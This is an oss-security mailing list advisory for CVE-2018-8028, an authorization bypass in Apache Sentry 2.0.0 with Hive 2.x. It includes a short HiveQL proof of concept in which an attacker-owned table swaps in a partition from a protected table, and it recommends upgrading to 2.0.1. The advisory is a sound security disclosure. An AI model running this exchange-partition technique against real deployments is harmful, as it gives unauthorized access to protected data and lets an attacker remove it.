[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] [SECURITY] CVE-2018-8028: Bypass ALTER TABLE EXCHANGE PARTITIONS authorization for Hi
From: Sergio Peña <spena82 () gmail ! com>
Date: 2018-08-23 16:38:32
Message-ID: CAFbRtroTd0NqpWrCUunEBNgL6WGiTyz+eyBvDquy9oxa3zki=Q () mail ! gmail ! com
[Download RAW message or body]
[SECURITY] CVE-2018-8028: Bypass ALTER TABLE EXCHANGE PARTITIONS
authorization for Hive
Severity:
Major
Vendor:
The Apache Software Foundation
Versions Affected:
This vulnerability affects only the version of Apache Sentry 2.0.0 due to
the introduction of
Hive 2.x.
Description:
An authenticated user can execute ALTER TABLE EXCHANGE PARTITIONS without
being authorized by Sentry.
This can allow an attacker unauthorized access to the partitioned data of a
Sentry protected table and can allow
an attacker to remove data from a Sentry protected table.
Mitigation:
Apache Sentry users using 2.0.0 should upgrade to 2.0.1 or later.
Example:
The admin has created the following table in a database that the attacker
doesn't have access to:
> CREATE TABLE target_database1.aliens (name string) PARTITIONED BY
(home_planet string, diet string);
> ALTER TABLE target_database1.aliens ADD PARTITION (home_planet='earth',
diet='milk shakes');
> ALTER TABLE target_database1.aliens ADD PARTITION
(home_planet='trapis-4', diet='sentient lifeforms with cheese');
The attacker has a database attacker_database, created as follows:
> CREATE TABLE attacker_database.data_stealer (name string) PARTITIONED BY
(home_planet string, diet string);
> ALTER TABLE attacker_database.data_stealer EXCHANGE PARTITION
(home_planet='earth', diet='milk shakes')
WITH TABLE target_database1.aliens;
The attacker now has access to all of the data in the target partitions
with the privileges available to them on attacker_database.
Credit:
This issue was discovered by Benjamin Iglauer of Cloudera.
References:
https://cwiki.apache.org/confluence/display/SENTRY/Vulnerabilities+found+in+Apache+Sentry
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic